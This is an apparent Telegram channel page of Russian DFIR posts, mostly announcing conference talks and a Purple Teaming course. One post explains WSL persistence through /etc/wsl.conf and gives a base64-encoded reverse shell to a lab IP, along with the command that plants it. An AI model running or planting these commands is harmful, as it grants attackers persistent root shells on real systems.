Garden Detective
СтатистикаDFIR... но на этом не останавливаемся. Администратор: @SmartGlue
- Последний пост
- 20 июл.
- Последнее чтение
- 12:46
- Постов за неделю
- 0
- Всего постов
- 26
- Тип
- открытый
- Язык
- русский
- В каталоге с
- 14 авг.
- 1/24сутки в ленте
- 640
- 1/48двое суток
- 733
- 1/72трое суток
- 791
Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.
Посты
#cybercamp2026 #leto 17 июля совместно с Иваном Груздом мы выступили с двумя докладами на летнем фестивале CyberCamp, где затронули кейс с APT-группировкой. 🔵 На сцене докладов: «Чтобы найти атакующего, иногда приходится провести двадцать лет вместе © кибербарон Мюнхгаузен» Рассмотрим хронологию затяжной APT-атаки. Вы узнаете, как хакеры годами оставались незамеченными, какие техники закрепления использовали и как скрывали сетевые следы. Имя этой группировки пока держим в секрете, но масштаб вас впечатлит. 💻 Ссылка на презентацию 🔵 На сцене практики: «Неужели обязательно нужно снести инфраструктуру, чтобы выгнать атакующих? © кибербарон Мюнхгаузен» Конкретные примеры и пошаговая проверка гипотез. Спикеры объяснят, как находить «приветы из прошлого», превентивно блокировать домены злоумышленников и проводить форензику при остром дефиците данных. 💻 Ссылка на презентацию А насчет самого мероприятия буду краток: всё как всегда на высшем уровне! 😘
#persistence #standofftalks2026 🔵 Вот и прошёл Standoff Talks 2026, и пора выложить презентацию доклада, с которой выступал 19 июня, — «Нельзя просто так взять и… не использовать Obsidian в атаке». *️⃣Ссылка на презентацию; *️⃣Запись выступления. 🔵 Кратко о том, что было в докладе: ➖ ПО для заметок Obsidian и система плагинов; ➖ разбор атаки кампании REF6598; ➖ обход Restricted Mode; ➖ использование Obsidian CLI; ➖ PoC описанного в докладе сценария (хорошее закрепление для любителей оставлять свои "заметки"). *️⃣код PoC (когда-нибудь я буду нормально оформлять репозитории, но это не точно 🥳); *️⃣ну и конечно, куда же без видео 🚪.
#anti_forensics #DFIR #cirf2026 🔵 Вчера (23.04.2026) проходила конференция CIRF 2026, на которой я выступил с докладом "Генеральная уборка в Windows: искусство заметать цифровые следы". Да, и это снова одна из моих любимых тем — контр-криминалистические методы. 🚪 *️⃣Ссылка на презентацию. 🔵 Отдельно хочу отметить организацию конференции и выступления других спикеров — всё было на высшем уровне. 🏖
Я в своем познании Purple Teaming настолько преисполнился, что решил: настало время делиться опытом. Поэтому мы вместе с Олегом и нашими друзьями из Inseca разработали 6-недельный курс по данному направлению. Какие темы затронем на курсе: 1️⃣Что такое Purple Teaming и почему вам стоит им заниматься? 2️⃣Как подготовиться к киберучениям в подобном формате и как сделать их процессом? 3️⃣Что такое эмуляция действий атакующих, где брать данные для нее, и как с ними работать? 4️⃣Как разрабатывать детектирующую логику и когда этим следует заниматься? 5️⃣Что такое Threat Hunting, когда и кому он нужен? 6️⃣Как проводить киберучения и как автоматизировать этот процесс? Старт курса намечен на 13 марта, а следовательно, для читателей канала есть приятный бонус: скидка 10% по промокоду gardendetective.
#persistence #t1037 #wsl 🔵 Копаясь в документации Microsoft по подсистеме WSL (Windows Subsystem for Linux), нашёл интересный механизм закрепления. В каждом инстансе можно создать файл /etc/wsl.conf и в секции [boot] указать для параметра command команду, которая будет выполняться с правами root при каждом его запуске. Пример содержимого файла /etc/wsl.conf (запуск обратной оболочки): [boot] command=echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM3LjEyOS8yMjIyIDA+JjE= | base64 -d | /bin/bash 🔴 Представим сценарий, в котором атакующий удалённо подключился по протоколу RDP к рабочей станции ИТ-администратора под управлением ОС Windows 11, на которой включен WSL2 и настроен Linux-дистрибутив. Цель злоумышленника — закрепиться в системе через файл /etc/wsl.conf. Команды (cmd.exe, powershell.exe; запуск без прав Администратора): wsl -l -v wsl -u root -d <distro_name> --exec bash -c "echo -e '[boot]\ncommand=echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM3LjEyOS8yMjIyIDA+JjE= | base64 -d | /bin/bash' > /etc/wsl.conf" Пссс... После получения обратной оболочки... Напоминаю: из WSL по умолчанию можно запускать исполняемые файлы Windows. 🔵 Дополнительные моменты: ➖После внесения изменений в конфигурационный файл /etc/wsl.conf, полезная нагрузка, указанная в command, выполнится при следующем запуске инстанса WSL. Некоторые нюансы работы экземпляра WSL: *️⃣в сборке 18267 Microsoft добавили механизм таймаута завершения работы инстанса WSL, и он по умолчанию установлен на 15 секунд. Это означает, что экземпляр будет остановлен через 15 секунд после завершения последнего процесса WSL; *️⃣если под процессом /init (PID 2) в WSL запущен хотя бы один пользовательский процесс (например, в фоновом режиме), то экземпляр WSL не будет завершён (ссылка); Пример: nohup python3 -m http.server 8000 & *️⃣для того, чтобы принудительно завершить работу определённого дистрибутива или всех сразу, можно использовать эти команды: wsl -t <distro_name> wsl --shutdown
#socforum2025 #zeronights2025 🔵 Последние 2 доклада в этом году (🍩): 1️⃣ Доклад «После Red Team можно не бояться атак... Не бояться атак, да?» [SOC Forum 2025]. ➖ Совместно с Олегом Скулкиным (ссылка на TG-канал). Описание доклада: В докладе рассмотрим различия в тактиках, техниках и процедурах (TTP) между реальными хакерскими группировками и командами Pentest / Red Team. Эта разница объясняется тем, что профили атак, используемые в пентестах, часто не отражают реальные угрозы. Доклад поможет понять, как отличать инциденты, связанные с реальными атаками, от имитаций, а также почему реагирование на «пентестовые» сценарии могут привести к ложному чувству защищенности. *️⃣Ссылка на презентацию; *️⃣Запись выступления. 2️⃣ Доклад «Горшочек, не вари! Истории про Web3-ловушки» [ZeroNights 2025]. ➖ Совместно с Николаем Микрюковым (@Nmikryukov). Описание доклада: Смарт-контракты, которые только притворяются уязвимыми... В нашем докладе мы рассмотрим существующие и ранее применявшиеся в Web3 трюки децентрализованных ханипотов. *️⃣Ссылка на презентацию; *️⃣Запись выступления.
#cybercamp2025 #DFIR #task 🔵 Настало время опубликовать пост с веб-ссылками на доклады и разбором одного задания с CyberCamp 2025. Максимальная концентрация DFIR. 🍩 1️⃣ Доклад «Первое правило CI/CD-клуба: компрометация начинается с доверия». *️⃣Ссылка на презентацию; *️⃣Запись выступления. 2️⃣ Разбор задания «Горький коммит». *️⃣Ссылка на презентацию; *️⃣Запись эфира с разборами кейсов. P.S.: в разборе присутствуют 2 веб-ссылки на дополнительный материал: ➖подготовка к эмуляции атаки; ➖эмуляция действий атакующих. 🔵 И конечно, не могу не упомянуть доклады от своих любимок (😍): 3️⃣Доклад «ИБ-специалист в отпуске? Поздравляю, теперь ты – инцидент-респондер!» от Ивана Грузда. *️⃣Ссылка на презентацию; *️⃣Запись выступления. 4️⃣Доклад «Чертовски хороший Compromise Assessment» от Анастасии Петровой. *️⃣Ссылка на презентацию; *️⃣Запись выступления.
#events 🔵 Пришло время для нового поста! А после него начну публиковать интересные исследования — ждите их в декабре. Пора освежить канал не только рассказами о выступлениях, но и чем-то новым. 🍩 1️⃣Про SOC Forum я уже писал в предыдущем посте, но напомню, что 20 ноября будет доклад на тему «После Red Team можно не бояться атак... Не бояться атак, да?». Да-да, там также будут мемы. Куда же без них! 2️⃣А 21 ноября будет эфир, завершающий арку CyberCamp 2025. На нём будет: ➖ разбор четырех заданий их авторами: «Горький коммит» из соло-программы (моё наследие; будет разбор данного задания от меня🍩), а из командных киберучений — to My Curious Programmer, «Политик аналитик», NightCall; ➖ подведение итогов кэмпа и статистика — самые интересные доклады и задания, самые активные участники, обсуждение обратной связи и планов на будущее; ➖ возможность выиграть еще немного мерча! 3️⃣И напоследок, 26 ноября совместно с Николаем Микрюковым (@Nmikryukov) будем выступать на конференции ZeroNights 2025 с докладов «Горшочек, не вари! Истории про Web3-ловушки», где расскажем про существующие и ранее применявшиеся в Web3 трюки децентрализованных ханипотов. Ну и мем для привлечения внимания 🥳
видео или голосовое, без подписи
видео или голосовое, без подписи
#events 🔵 Уже почти конец года, но различных выступлений и активностей так и не убавилось.🚪 1️⃣Начнём с самого интересного — это CyberCamp 2025 (ну просто любимки). В первый день докладов кэмпа (21 октября) можно будет погрузиться в мир тайн компрометации. Поэтому рекомендую послушать эти три доклада. Также в данном году появился новый формат — консультации, где можно задать свои животрепещущие вопросы спикерам по различным темам. Если хочется обсудить Incident Response, Compromise Assessment или Purple Teaming, то регистрируйтесь — пообщаемся на эти темы без лишней душноты. 💻 P.S.: планируется какой-то секретный эфир. Что именно это будет, пока остается загадкой. UPDATE: секретный эфир. 2️⃣На конференция SOC Forum 2025 будет доклад "После Red Team можно не бояться атак... Не бояться атак, да?" (20 ноября). Совместно с Олегом поговорим про различия... между реальными хакерскими группировками и командами Pentest/Red Team. 3️⃣И последнее: подал 2 доклада на ZeroNights. Так что, ждём результатов от CFP комитета.
видео или голосовое, без подписи
видео или голосовое, без подписи
#uwp #DFIR #mfd2025 🔵 С 11 по 12 сентября проходила девятая ежегодная конференция — Moscow Forensics Day 2025. На данном мероприятии выступал с докладом на тему "UWP под прицелом DFIR: что скрывают современные Windows-приложения". Удалось осветить следующие пункты: 1️⃣ Что такое UWP (Universal Windows Platform) и MSIX-пакеты. 2️⃣ Инциденты ИБ, связанные с использованием MSIX-пакетов. 3️⃣ Криминалистические артефакты, возникающие при установке MSIX-пакета, и их источники. 4️⃣ Приложения из Microsoft Store, представляющие интерес для злоумышленников. 🔵 Также отдельно выкладываю список полезных веб-ресурсов/веб-ссылок (оформлено в Obsidian). P.S.: уже в состоянии ожидания Moscow Forensics Day 2026 🚪
видео или голосовое, без подписи
#offzone2025 🔵 Прошла очередная конференция — OFFZONE 2025. Поэтому самое время выложить презентации докладов, с которыми я выступал на данном мероприятии.🚪 1️⃣ На следующей неделе выложу дополнительный материал к докладу "Охота на призраков: изучение сетевой инфраструктуры атакующих" — полезные веб-ресурсы и ссылки, оформленные в Obsidian.🤪 2️⃣ Также позже залью на свой GitHub скрипты из второго доклада, связанного с GitLab. UPDATE: *️⃣Запись выступления №1; *️⃣Запись выступления №2.
видео или голосовое, без подписи
#offzone2025 22 августа буду выступать на конференции OffZone 2025 с двумя докладами [🤪 которые я успешно доделал 🤪]. Буду рад видеть каждого, кто заглянет на мои выступления. Расписание: 1️⃣"Охота на призраков: изучение сетевой инфраструктуры атакующих". Трек: Threat.Zone. Время: 12:30-13:00. Описание. 2️⃣"Охота на тануки: узнаём точную версию GitLab". Трек: Fast Track. Время: 14:45–15:15. Описание.
видео или голосовое, без подписи
видео или голосовое, без подписи